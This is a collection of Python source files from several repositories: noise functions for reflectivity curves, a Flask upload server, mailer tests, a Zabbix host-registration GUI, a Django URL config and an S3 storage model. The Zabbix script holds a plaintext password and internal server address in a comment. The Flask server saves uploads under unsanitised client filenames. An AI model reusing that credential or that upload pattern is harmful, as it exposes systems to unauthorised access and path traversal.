np\r\nfrom numpy import ndarray\r\n\r\nfrom .distributions import random_logarithmic_distribution\r\n\r\n\r\ndef iterate_over_curves(func):\r\n @functools.wraps(func)\r\n def wrapper(reflectivity_curves, *args, **kwargs):\r\n number_of_dimensions = len(reflectivity_curves.shape)\r\n if number_of_dimensions not in (1, 2):\r\n raise ValueError('number of dimensions mus be 1 or 2')\r\n if number_of_dimensions == 1:\r\n return func(reflectivity_curves, *args, **kwargs)\r\n else:\r\n return np.array([func(reflectivity_curve, *args, **kwargs) for reflectivity_curve in reflectivity_curves])\r\n\r\n return wrapper\r\n\r\n\r\ndef apply_uniform_noise(refl, noise_range):\r\n shape = refl.shape\r\n noise_factors = np.random.uniform(*noise_range, shape)\r\n return refl * noise_factors\r\n\r\n\r\ndef apply_scaling_factor(refl, scale_factor_range):\r\n refl = np.atleast_2d(refl).copy()\r\n n_curves = len(refl)\r\n scale_factors = 
np.random.uniform(*scale_factor_range, n_curves)\r\n    for i in range(n_curves):\r\n        refl[i] *= scale_factors[i]\r\n    if n_curves == 1:\r\n        return refl[0]\r\n    else:\r\n        return refl\r\n\r\n\r\ndef apply_shot_noise(reflectivity_curves: ndarray, shot_noise_spread: Union[float, Tuple[float, float]]) -> Tuple[\r\n    ndarray, ndarray]:\r\n    \"\"\"Returns reflectivity curves with applied shot noise based on `shot_noise_spread`.\r\n\r\n    Args:\r\n        reflectivity_curves: Array of normalized reflectivity curves\r\n        shot_noise_spread: Scaling factor c for the standard deviation sqrt(I*c) of the shot noise around\r\n            the intensity of simulated reflectivity curves. Since the intensity is normalized, this is\r\n            equivalent to setting the direct beam intensity I_0 = 1/c. If a tuple with two values is given,\r\n            a random value between the two is chosen for each curve.\r\n\r\n    Returns:\r\n        noisy_reflectivity, spreads\r\n    \"\"\"\r\n    dimensions = len(reflectivity_curves.shape)\r\n    if dimensions == 1:\r\n        num_curves = 1\r\n    elif dimensions == 2:\r\n        num_curves = len(reflectivity_curves)\r\n    else:\r\n        raise ValueError('number of dimensions mus be 1 or 2')\r\n\r\n    if type(shot_noise_spread) in (float, int):\r\n        spreads = np.repeat(shot_noise_spread, num_curves)\r\n    elif type(shot_noise_spread) is tuple:\r\n        spreads = random_logarithmic_distribution(*shot_noise_spread, num_curves)\r\n    else:\r\n        raise TypeError(f'shot_noise_spread must be float or tuple and is {type(shot_noise_spread)}')\r\n\r\n    if num_curves == 1:\r\n        noisy_reflectivity = np.clip(np.random.normal(reflectivity_curves, np.sqrt(reflectivity_curves * spreads[0])),\r\n                                     1e-16, None)\r\n    else:\r\n        noisy_reflectivity = np.array(\r\n            [np.clip(np.random.normal(curve, np.sqrt(curve * spread)), 1e-16, None) for curve, spread in\r\n             zip(reflectivity_curves, spreads)])\r\n    return noisy_reflectivity, spreads\r\n\r\n\r\ndef apply_poisson_noise(reflectivity_curves: ndarray, rate_spread: Union[float, Tuple[float, float]]) -> Tuple[\r\n    ndarray, ndarray]:\r\n    \"\"\"Returns reflectivity curves with applied Poisson noise based on `rate_spread`.\r\n\r\n    Args:\r\n        reflectivity_curves: Array of normalized reflectivity curves\r\n        rate_spread: Scaling factor c for the standard deviation sqrt(I*c) of the shot noise around\r\n            the intensity of simulated reflectivity curves. Since the intensity is normalized, this is\r\n            equivalent to setting the direct beam intensity I_0 = 1/c. 
If a tuple with two values is given,\r\n a random value between the two is chosen for each curve.\r\n\r\n Returns:\r\n noisy_reflectivity, spreads\r\n \"\"\"\r\n dimensions = len(reflectivity_curves.shape)\r\n if dimensions == 1:\r\n num_curves = 1\r\n elif dimensions == 2:\r\n num_curves = len(reflectivity_curves)\r\n else:\r\n raise ValueError('number of dimensions mus be 1 or 2')\r\n\r\n if type(rate_spread) in (float, int):\r\n spreads = np.repeat(rate_spread, num_curves)\r\n elif type(rate_spread) is tuple:\r\n spreads = random_logarithmic_distribution(*rate_spread, num_curves)\r\n else:\r\n raise TypeError(f'rate_spread must be float or tuple and is {type(rate_spread)}')\r\n\r\n if num_curves == 1:\r\n noisy_reflectivity = np.clip(np.random.poisson(reflectivity_curves * spreads[0]) / spreads[0], 1e-16, None)\r\n else:\r\n noisy_reflectivity = np.array(\r\n [np.clip(np.random.poisson(curve * spread) / spread, 1e-16, None) for curve, spread in\r\n zip(reflectivity_curves, spreads)])\r\n return noisy_reflectivity, spreads\r\n\r\n\r\ndef generate_background(number_of_curves: int, number_of_q_values: int,\r\n background_base_level: Union[float, Tuple[float, float]],\r\n relative_background_spread: float) -> Tuple[ndarray, ndarray]:\r\n \"\"\"Returns a background with a normal distribution that can be added to a reflectivity curve.\r\n\r\n Args:\r\n number_of_curves: Number of curves for which a background is generated\r\n number_of_q_values: Length of the generated array (should be same length as reflectivity curve)\r\n background_base_level: Range from which the mean of the normal distribution is chosen\r\n relative_background_spread: Relative standard deviation of the normal distribution (e.g. a value of ``0.1``\r\n means the standard deviation is 10% of the mean)\r\n\r\n Returns:\r\n background, means: background has dimensions ``(number_of_curves, number_of_q_values)``\r\n \"\"\"\r\n\r\n if type(background_base_level) in (float, int):\r\n return np.random.normal(background_base_level, relative_background_spread * background_base_level,\r\n (number_of_curves, number_of_q_values)), np.repeat(background_base_level,\r\n number_of_curves)\r\n elif type(background_base_level) is tuple:\r\n mean = random_logarithmic_distribution(*background_base_level, number_of_curves)\r\n means = np.tile(mean, (number_of_q_values, 1)).T\r\n stdevs = relative_background_spread * means\r\n return np.random.normal(means, stdevs, (number_of_curves, number_of_q_values)), mean\r\n else:\r\n raise TypeError(f'background_base_level must be float, int or tuple and is {type(background_base_level)}')\r\n","repo_name":"schreiber-lab/mlreflect","sub_path":"mlreflect/data_generation/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":6625,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"8852194054","text":"import os\nfrom flask import Flask, request, redirect, url_for, send_from_directory, render_template\nfrom detect import detect_model\nimport json\n\nUPLOAD_FOLDER = './uploads'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg',])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef allowed_file(filename):\n return '.' 
in filename and \\\n           filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n    \n@app.route('/', methods=['GET', 'POST'])\n\ndef upload_file():\n    if request.method == 'POST':\n        image_file = request.files['file']\n        if image_file and allowed_file(image_file.filename):\n            image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], image_file.filename))\n            # redirect back to the upload page once the file has been saved\n            return redirect(request.url)\n    return 'Upload an image file via a POST request.'\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port = 8181)\n","repo_name":"vignesh-madanan/AIforimagev2","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30222955395","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTests for interfaces.py.\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# disable: accessing protected members, too many methods\n# pylint: disable=W0212,R0904\n\nimport unittest\n\nclass AbstractPrincipal(object):\n    id = 'id'\n    email = 'sjohnson@nextthought.com'\n\n    def __conform__(self, iface):\n        return self\n\n\nclass TestEmailAddressablePrincipal(unittest.TestCase):\n\n    def _makeOne(self, context):\n        from nti.mailer.interfaces import EmailAddressablePrincipal\n        return EmailAddressablePrincipal(context)\n\n    def test_copies_title(self):\n        class Context(AbstractPrincipal):\n            id = 'id'\n            title = 'MyTitle'\n\n        prin = self._makeOne(Context())\n        self.assertIs(prin.id, Context.id)\n        self.assertIs(prin.email, Context.email)\n        self.assertIs(prin.title, Context.title)\n        self.assertIsNone(prin.description)\n\n    def test_copies_description(self):\n        class Context(AbstractPrincipal):\n            id = 'id'\n            description = 'MyDesc'\n\n        prin = self._makeOne(Context())\n        self.assertIs(prin.id, Context.id)\n        self.assertIs(prin.email, Context.email)\n        self.assertIs(prin.description, Context.description)\n        self.assertIsNone(prin.title)\n\n    def test_str_repr(self):\n        prin = self._makeOne(AbstractPrincipal())\n        expected = 'Principal(id/sjohnson@nextthought.com)'\n        self.assertEqual(str(prin), expected)\n        self.assertEqual(repr(prin), expected)\n","repo_name":"OpenNTI/nti.mailer","sub_path":"src/nti/mailer/tests/test_interfaces.py","file_name":"test_interfaces.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24829276745","text":"from datetime import datetime\nimport readline\nfrom unicodedata import numeric\nimport sys\nfrom threading import Thread\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5 import uic\nimport csv\nimport re\nfrom zabbix_api import ZabbixAPI\nimport os\n\n\napp = QApplication([])\nwindow = uic.loadUi('layout.ui')\nwindow.setWindowTitle('Cadastro no Zabbix por API - @chriscoliveira')\n\n# faz a conexão com o zabbix\nwith open('config.cfg', 'r') as arquivo:\n    zabbix_server, zabbix_user, zabbix_pass = '', '', ''\n    linhas = arquivo.readlines()\n    for linha in linhas:\n        if 'server' in linha:\n            zabbix_server = linha.split('=')[1].strip()\n        if 'user' in linha:\n            zabbix_user = linha.split('=')[1].strip()\n        if 'pass' in linha:\n            zabbix_pass = linha.split('=')[1].strip()\n    zapi = ZabbixAPI(server=zabbix_server)\n    zapi.login(zabbix_user, zabbix_pass)\n\n\ndef le_grupos_cfg():\n    GRUPOID = []\n    with open('names_groups_templates.cfg', 'r') as arquivo:\n        linhas = arquivo.readlines()\n\n    for linha in linhas:\n        if not linha.startswith('#'):\n            nome, grupo, template = linha.split(',')\n            nome = 
nome.replace(' ', '').upper()\n grupo = grupo.replace(' ', '').upper()\n template = template.replace('\\n', '').replace(' ', '').upper()\n GRUPOID.append([nome, grupo, template])\n return GRUPOID\n\n\ndef get_grupo_template(nome_grupo_host):\n with open('names_groups_templates.cfg', 'r') as arquivo:\n linhas = arquivo.readlines()\n GRUPOID = []\n for linha in linhas:\n if not linha.startswith('#'):\n nome, grupo, template = linha.split(',')\n nome = nome.replace(' ', '').upper()\n grupo = grupo.replace(' ', '').upper()\n template = template.replace('\\n', '').replace(' ', '').upper()\n if nome_grupo_host in linha:\n GRUPOID.append([nome, grupo, template])\n\n for x in GRUPOID:\n if nome_grupo_host == x[0]:\n return x[1], x[2]\n\n\ndef abrir_csv():\n caminho, _ = QFileDialog.getOpenFileName(\n window.centralwidget,\n 'Abrir imagem',\n os.getcwd(),\n options=QFileDialog.DontUseNativeDialog\n )\n return caminho\n\n\ndef get_grupo_loja(loja):\n ct = ''\n if loja:\n grupo_loja = zapi.hostgroup.get({\n 'output': 'extend',\n 'search': {\n 'name': loja\n },\n 'sortfield': 'name',\n 'sortorder': 'ASC'\n })\n for x in grupo_loja:\n ct = x['groupid']\n print(x['groupid'])\n return x['groupid']\n\n\ndef mapa_zabbix():\n loja = window.ed_ct.text().upper().replace('CT', '')\n if loja:\n with open('ct.txt', 'w') as f:\n f.write(loja)\n os.system('python3 api_cria_mapa.py')\n else:\n QMessageBox.about(\n window, 'Erro', 'Precisa informar o numero da filial')\n\n\ndef getnametemplates(pesquisa=False):\n # zapi = ZabbixAPI(server=\"http://10.131.0.30/zabbix\")\n # zapi.login(\"USUARIO_API\", \"tenda123\")\n if pesquisa:\n itens = zapi.template.get({\n 'output': 'extend',\n 'sortfield': 'name',\n 'sortorder': 'ASC'\n })\n\n msg = 'Exibe os templates do zabbix'\n with open('envioTelegram.txt', 'w') as arquivo:\n arquivo.write(f'\\n{msg}\\n')\n\n for item in itens:\n if item['templateid'] == pesquisa:\n return item['host']\n\n\ndef getnameGrupo(pesquisa=False):\n # zapi = ZabbixAPI(server=\"http://10.131.0.30/zabbix\")\n # zapi.login(\"USUARIO_API\", \"tenda123\")\n if pesquisa:\n hosts = zapi.hostgroup.get({\n 'output': 'extend',\n 'sortfield': 'name',\n 'sortorder': 'ASC'\n })\n\n for host in hosts:\n if host['groupid'] == pesquisa:\n print(host['name'])\n return host['name']\n\n\ndef cadastra_zabbix():\n # coleta os dados para cadastro\n fcsv = abrir_csv()\n grupo = window.ed_ct.text().upper().replace('CT', '')\n GrupoIDLoja = get_grupo_loja(grupo)\n GrupoIDGrupo, TemplateID = get_grupo_template(\n window.comboBox.currentText())\n\n # verifica se os dados foram preenchidos\n if fcsv and GrupoIDLoja and GrupoIDGrupo and TemplateID and grupo:\n print(fcsv, GrupoIDLoja, GrupoIDGrupo, TemplateID, sep='\\n')\n retorno = QMessageBox.question(\n window, 'MUITA ATENÇÃO!!!', f\"Tem certeza que deseja cadastrar os itens??\\n\\nArquivo CSV:{fcsv}\\nLoja {getnameGrupo(GrupoIDLoja)}\\nGrupo Host: {getnameGrupo(GrupoIDGrupo)}\\nTemplate: {getnametemplates(pesquisa=TemplateID)}\", QMessageBox.Yes | QMessageBox.No)\n\n # se o usuario confirmar o cadastro\n if retorno == QMessageBox.Yes:\n itemadd = []\n print(f'arquivo csv {fcsv}')\n itemADD = open(f'{fcsv}')\n\n # verifica o delimitador do arquivo\n sniffer = csv.Sniffer()\n with open(fcsv) as fp:\n delimiter = sniffer.sniff(fp.read(5000)).delimiter\n\n # abre a planilha\n listas = csv.reader(itemADD, delimiter=delimiter)\n\n itemadd1 = []\n itemadd = []\n for lista in listas:\n try:\n itemadd1 = lista[0], lista[1], lista[2]\n itemadd.append(itemadd1)\n except Exception 
as e:\n pass\n print(itemadd)\n\n # inicia o cadastro no zabbix\n contador = 0\n for x in itemadd:\n nome = x[0]\n iP = x[1]\n descricao = x[2]\n print(\n f'NOME {nome.upper()}, IP {iP.upper()}, DESC {descricao.upper()}')\n try:\n hostcriado = zapi.host.create({\n \"host\": nome.upper(),\n \"status\": 0,\n \"description\": descricao.upper(),\n \"interfaces\": [\n {\n \"type\": 1,\n \"main\": 1,\n \"useip\": 1,\n \"ip\": iP,\n \"dns\": \"\",\n \"port\": \"10050\"\n },\n {\n \"type\": 2,\n \"main\": 1,\n \"useip\": 1,\n \"ip\": iP,\n \"dns\": \"\",\n \"port\": \"161\",\n \"details\": {\n \"version\": 3,\n \"bulk\": 0,\n \"contextname\": \"\",\n \"securitylevel\": 1}\n }\n ],\n \"groups\": [\n {\n \"groupid\": GrupoIDLoja\n },\n {\n \"groupid\": GrupoIDGrupo\n }\n ],\n \"templates\": [\n {\n \"templateid\": TemplateID\n }\n ]\n })\n\n contador = contador + 1\n print(nome + \" criado! id:\" + hostcriado[\"hostids\"][0])\n except Exception as e:\n print(f'\\n\\nErro ao cadastrar o host.\\n\\n{e}')\n print(\"\\nTotal de itens cadastrados:\" + str(contador))\n\n # cadastro finalizado\n QMessageBox.about(window, 'Importação',\n f'Foram Cadastrados {contador} itens')\n\n # caso falte algum campo exibe mensagem de erro\n else:\n QMessageBox.about(window, 'Importação',\n f'Para cadastrar os itens é necessário preencher todos os campos')\n\n\ndef testecsv():\n fcsv = r'/Scripts/RABBIX/teste.csv'\n itemadd = []\n print(f'arquivo csv {fcsv}')\n itemADD = open(f'{fcsv}')\n\n # verifica o delimitador do arquivo\n sniffer = csv.Sniffer()\n with open(fcsv) as fp:\n delimiter = sniffer.sniff(fp.read(5000)).delimiter\n\n # abre a planilha\n listas = csv.reader(itemADD, delimiter=delimiter)\n\n itemadd1 = []\n itemadd = []\n for lista in listas:\n try:\n itemadd1 = lista[0], lista[1], lista[2]\n itemadd.append(itemadd1)\n except Exception as e:\n pass\n print(itemadd)\n\n\ndef carregaCombo():\n lista = le_grupos_cfg()\n listagem = []\n for item in lista:\n listagem.append(item[0])\n window.comboBox.addItems(listagem)\n\n\ncarregaCombo()\nwindow.bt_enviar.clicked.connect(cadastra_zabbix)\nwindow.bt_mapa.clicked.connect(mapa_zabbix)\n# window.bt_mapa.clicked.connect(testecsv)\nwindow.show()\napp.exec()\n","repo_name":"chriscoliveira/RABBIX","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9115,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11022687807","text":"import socket\nfrom lockfile import LockTimeout, AlreadyLocked\nimport time\n\n\nclass SocketLock(object):\n timeout = None\n lockname = None\n\n def __init__(self, lockname, timeout=None):\n #can't use super here as LinkFileLock is an old style class\n self.lockname = lockname\n self.timeout = timeout\n\n def acquire(self, timeout=None):\n if not timeout:\n timeout = self.timeout\n\n end_time = time.time()\n if timeout is not None and timeout > 0:\n end_time += timeout\n\n while True:\n try:\n self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n self.socket.bind('\\0' + self.lockname)\n return\n except socket.error:\n if timeout is not None and time.time() > end_time:\n if timeout > 0:\n raise LockTimeout\n else:\n raise AlreadyLocked\n time.sleep(timeout is not None and timeout / 10 or 0.1)\n\n def release(self):\n self.socket.close()\n\n def __enter__(self):\n \"\"\"\n Context manager support.\n \"\"\"\n self.acquire()\n return self\n\n def __exit__(self, *_exc):\n \"\"\"\n Context manager support.\n \"\"\"\n 
self.release()\n","repo_name":"mmrazik/simu","sub_path":"simu/socketlock.py","file_name":"socketlock.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30116896914","text":"#!/usr/bin/python3\n# Author - Samuel Chigozie\n\"\"\"Output numbers 1 to 100 with a space as a separator.\nIf a number is divisible by 3, print \"Fizz\" instead of the number.\nIf a number is divisible by 5, print \"Buzz\" instead of the number.\nIf a num is divisible by both 3 & 5, print \"FizzBuzz\" than num.\n\"\"\"\n\n\ndef fizzbuzz():\n for number in range(1, 101):\n if number % 3 == 0 and number % 5 == 0:\n print(\"FizzBuzz \", end=\"\")\n elif number % 3 == 0:\n print(\"Fizz \", end=\"\")\n elif number % 5 == 0:\n print(\"Buzz \", end=\"\")\n else:\n print(\"{} \".format(number), end=\"\")\n","repo_name":"Samuelchigozie/alx-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/12-fizzbuzz.py","file_name":"12-fizzbuzz.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1214974620","text":"# coding=utf8\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n url(r'', include(\"risk_auth.urls\", namespace='risk_auth')),\n url(r'permissions/', include(\"permissions.urls\", namespace=\"permissions\")),\n url(r'strategy/', include(\"strategy.urls\", namespace=\"strategy\")),\n url(r'menu/', include(\"menu.urls\", namespace=\"menus\")),\n url(r'rule/', include(\"rule.urls\", namespace=\"rule\")),\n url(r'config/', include(\"bk_config.urls\", namespace=\"config\")),\n url(r'log_manage/', include(\"log_manage.urls\", namespace=\"log_manage\")),\n]\n\n# 用于线上时应移除此部分,动静分离\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif not settings.DEBUG:\n from django.views.defaults import (page_not_found, server_error,\n permission_denied)\n\n urlpatterns += [\n url(r'404/', page_not_found),\n url(r'500/', server_error),\n url(r'403/', permission_denied),\n ]\n","repo_name":"momosecurity/aswan","sub_path":"www/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":2910,"dataset":"github-code","pt":"47"} +{"seq_id":"29591187447","text":"# File :main_LineIntersectionPoints.py\r\n# Author :WJ\r\n# Function :\r\n# Time :2021/03/18\r\n# Version :\r\n# Amend :\r\n\r\nimport numpy as np\r\nimport src.DensityOfProjectedPoints as DoPP\r\nimport src.GraphMatchByLineIntersectionPoints as GM_LIPoint\r\nimport src.IterativeClosestPoints as ICP\r\nimport src.Registration_H as Reg_H\r\n\r\nif __name__ == '__main__':\r\n # name = 'PCB'\r\n name = 'ABC'\r\n if name == 'ABC':\r\n\r\n # 1.导入原始数据\r\n lidar0 = np.loadtxt('..\\\\data\\\\ABC\\\\CSU_ABC_cut.txt', delimiter=',')\r\n lidar = lidar0[:, :3]\r\n dlg0 = np.loadtxt('..\\\\data\\\\ABC\\\\Polyline_ABC.txt', delimiter=',')\r\n dlg = dlg0[:, :3]\r\n\r\n # 2.DoPP\r\n lidar_dopp = DoPP.DoPP.run(lidar, 10, 1, 10, name)\r\n\r\n # 3.图匹配\r\n R1, T1, lidar_dopp = GM_LIPoint.all_Ransac.run(dlg, lidar_dopp, name)\r\n\r\n # 4.ICP\r\n R2, T2, rmse = ICP.ICP(lidar_dopp, dlg[:, :2], 45, 100)\r\n\r\n # 5.应用变换参数、输出平面配准完成的LiDARD点云\r\n lidar[:, :2] = ICP.Transform(lidar[:, :2], R1, T1)\r\n lidar[:, :2] = 
ICP.Transform(lidar[:, :2], R2, T2)\r\n np.savetxt('..\\\\output\\\\ABC\\\\CSU_ABC_2D_LIPoint.txt', lidar, delimiter=',')\r\n\r\n # 6.高程配准、输出配准好的LiDAR点云\r\n lidar, Z, z_rmse = Reg_H.registration_roof(dlg, lidar)\r\n np.savetxt('..\\\\output\\\\ABC\\\\CSU_ABC_3D_LIPoint.txt', lidar, delimiter=',')\r\n GM_LIPoint.output(R1, T1, R2, T2, Z, rmse, z_rmse, '..\\\\output\\\\ABC\\\\MatchResult_ABC_LIPoint.txt')\r\n\r\n elif name == 'PCB':\r\n\r\n # 导入原始数据\r\n lidar0 = np.loadtxt('..\\\\data\\\\PCB\\\\CSU_PCB_cut_02.txt', delimiter=',')\r\n lidar = lidar0[:, :3]\r\n dlg0 = np.loadtxt('..\\\\data\\\\PCB\\\\Polyline_PCB.txt', delimiter=',')\r\n dlg = dlg0[:, :3]\r\n\r\n # DoPP\r\n lidar_dopp = DoPP.DoPP.run(lidar, 1, 0.5, 10, name)\r\n\r\n # 图匹配\r\n R1, T1, lidar_dopp = GM_LIPoint.all_Ransac.run(dlg, lidar_dopp, name)\r\n print('图匹配所求参数')\r\n print(R1)\r\n print(T1)\r\n\r\n # ICP\r\n R2, T2, rmse = ICP.ICP(lidar_dopp, dlg[:, :2], 45, 100)\r\n print('ICP所求参数')\r\n print(R2)\r\n print(T2)\r\n\r\n # 刚体变换\r\n lidar[:, :2] = ICP.Transform(lidar[:, :2], R1, T1)\r\n lidar[:, :2] = ICP.Transform(lidar[:, :2], R2, T2)\r\n np.savetxt('..\\\\output\\\\PCB\\\\CSU_PCB_2D_LIPoint.txt', lidar, delimiter=',')\r\n\r\n # 高程配准\r\n VertailControlPoints = np.loadtxt('..\\\\data\\\\PCB\\\\CSU_PCB_VertailControlPoints.txt', delimiter=',')\r\n lidar, Z, z_rmse = Reg_H.registration_vertialPoints(VertailControlPoints, lidar, r=0.5)\r\n np.savetxt('..\\\\output\\\\PCB\\\\CSU_PCB_3D_LIPoint.txt', lidar, delimiter=',')\r\n GM_LIPoint.output(R1, T1, R2, T2, Z, rmse, z_rmse, '..\\\\output\\\\PCB\\\\MatchResult_PCB_LIPoint.txt')\r\n","repo_name":"Anonymous772066235/GraduationDesignProgram","sub_path":"Lidar_DLG/src/main_LineIntersectionPoints.py","file_name":"main_LineIntersectionPoints.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6944141936","text":"\"\"\"\nlog.py: Setup a logger that has colours!\n\"\"\"\n\nimport io\nimport logging\nfrom contextlib import contextmanager\n\nimport coloredlogs\n\nFIELD_STYLES = dict(levelname=dict(color=\"green\", bold=coloredlogs.CAN_USE_BOLD_FONT))\n\n\ndef setup_logger(name):\n \"\"\"Create logger and configure with cool colors!\"\"\"\n logger = logging.getLogger(name)\n\n # Use level='NOTSET' (most permissive) here so whatever level the user later selects\n # does get printed. 
with level='INFO' here, setting LOGGER.setLevel('DEBUG') in the\n # app doesn't work, and therefore the --debug command line options doesn't work.\n coloredlogs.install(\n level=\"NOTSET\",\n fmt=\"%(levelname)s - %(message)s\",\n logger=logger,\n field_styles=FIELD_STYLES,\n )\n\n logger.setLevel(\"INFO\") # default logging level is INFO\n return logger\n\n\nLOGGER = setup_logger(\"root\")\n\n\n@contextmanager\ndef capture_logs():\n \"\"\"Context manager to capture the logs in a StringIO within the managed context\n\n Usage:\n with capture_logs() as captured_logs:\n do stuff that logs\n logging_output = captured_log.getvalue()\n \"\"\"\n log_capture_stream = io.StringIO()\n stream_handler = logging.StreamHandler(log_capture_stream)\n stream_handler.setLevel(logging.INFO)\n old_handlers = list(LOGGER.handlers)\n for x in old_handlers:\n LOGGER.removeHandler(x) # suppress all existing handlers\n try:\n LOGGER.addHandler(stream_handler) # capture logging output\n LOGGER.propagate = False # suppresses logging output to console\n yield log_capture_stream\n finally:\n LOGGER.removeHandler(stream_handler)\n LOGGER.propagate = True\n for x in old_handlers:\n LOGGER.addHandler(x)\n","repo_name":"ReadAlongs/Studio","sub_path":"readalongs/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"47"} +{"seq_id":"6227009521","text":"from flask.cli import AppGroup\nfrom .users import seed_users, undo_users\nfrom .patientcards import seed_patientCards, undo_patientCards\nfrom .diagnosis import seed_diagnosis, undo_diagnosis\n\n# Creates a seed group to hold our commands\n# So we can type `flask seed --help`\nseed_commands = AppGroup('seed')\n\n\n# Creates the `flask seed all` command\n@seed_commands.command('all')\ndef seed():\n seed_users()\n seed_patientCards()\n seed_diagnosis()\n # Add other seed functions here\n\n\n# Creates the `flask seed undo` command\n@seed_commands.command('undo')\ndef undo():\n undo_users()\n undo_patientCards()\n undo_diagnosis()\n # Add other undo functions here\n","repo_name":"johnnvas/Med.io","sub_path":"app/seeds/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74224944461","text":"import logging\nimport os\nimport pprint\nimport re\nfrom functools import wraps\n\nimport boto3\nimport botocore\nfrom common import utils\nfrom django.conf import settings\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\nfrom . import StorageException\nfrom .location import Location\n\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef boto_exception(fn):\n @wraps(fn)\n def _inner(*args, **kwargs):\n try:\n return fn(*args, **kwargs)\n except botocore.exceptions.BotoCoreError as e:\n raise StorageException(\"AWS error: %r\", e)\n\n return _inner\n\n\nclass S3(models.Model):\n space = models.OneToOneField(\"Space\", to_field=\"uuid\", on_delete=models.CASCADE)\n access_key_id = models.CharField(\n max_length=64, blank=True, verbose_name=_(\"Access Key ID to authenticate\")\n )\n secret_access_key = models.CharField(\n max_length=256,\n blank=True,\n verbose_name=_(\"Secret Access Key to authenticate with\"),\n )\n endpoint_url = models.CharField(\n max_length=2048,\n verbose_name=_(\"S3 Endpoint URL\"),\n help_text=_(\"S3 Endpoint URL. Eg. 
https://s3.amazonaws.com\"),\n )\n region = models.CharField(\n max_length=64,\n verbose_name=_(\"Region\"),\n help_text=_(\"Region in S3. Eg. us-east-2\"),\n )\n bucket = models.CharField(\n max_length=64,\n verbose_name=_(\"S3 Bucket\"),\n blank=True,\n help_text=_(\"S3 Bucket Name\"),\n )\n\n class Meta:\n verbose_name = _(\"S3\")\n app_label = \"locations\"\n\n ALLOWED_LOCATION_PURPOSE = [\n Location.AIP_STORAGE,\n Location.DIP_STORAGE,\n Location.REPLICATOR,\n Location.TRANSFER_SOURCE,\n ]\n\n @property\n def resource(self):\n if not hasattr(self, \"_resource\"):\n config = botocore.config.Config(\n connect_timeout=settings.S3_TIMEOUTS, read_timeout=settings.S3_TIMEOUTS\n )\n boto_args = {\n \"service_name\": \"s3\",\n \"endpoint_url\": self.endpoint_url,\n \"region_name\": self.region,\n \"config\": config,\n }\n if self.access_key_id and self.secret_access_key:\n boto_args.update(\n aws_access_key_id=self.access_key_id,\n aws_secret_access_key=self.secret_access_key,\n )\n self._resource = boto3.resource(**boto_args)\n return self._resource\n\n @boto_exception\n def _ensure_bucket_exists(self):\n \"\"\"Ensure that the bucket exists by asking it something about itself.\n If we cannot retrieve metadata about it, and specifically, we can\n determine the endpoint has returned a `NoSuchBucket' error code then\n we attempt to create the bucket, else, we raise a StorageException.\n\n NB. Boto3 has an API called head_bucket that looks to return 400,\n Bad Request at time of 1.9.174 when the S3 documents suggest 404, or\n more 'specifically':\n\n > Otherwise, the operation might return responses such as 404 Not\n > Found and 403 Forbidden. \"\n via-- Amazon AWS: https://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketHEAD.html\n \"\"\"\n LOGGER.debug(\"Test the S3 bucket '%s' exists\", self.bucket_name)\n try:\n loc_info = self.resource.meta.client.get_bucket_location(\n Bucket=self.bucket_name\n )\n LOGGER.debug(\"S3 bucket's response: %s\", loc_info)\n except botocore.exceptions.ClientError as err:\n error_code = err.response[\"Error\"][\"Code\"]\n if error_code != \"NoSuchBucket\":\n raise StorageException(err)\n LOGGER.info(\"Creating S3 bucket '%s'\", self.bucket_name)\n # LocationConstraint cannot be specified if it us-east-1 because it is the default, see: https://github.com/boto/boto3/issues/125\n if self.region.lower() == \"us-east-1\":\n self.resource.create_bucket(Bucket=self.bucket_name)\n else:\n self.resource.create_bucket(\n Bucket=self.bucket_name,\n CreateBucketConfiguration={\"LocationConstraint\": self.region},\n )\n\n @property\n def bucket_name(self):\n return self.bucket or str(self.space_id)\n\n def browse(self, path):\n LOGGER.debug(\"Browsing s3://%s/%s on S3 storage\", self.bucket_name, path)\n path = 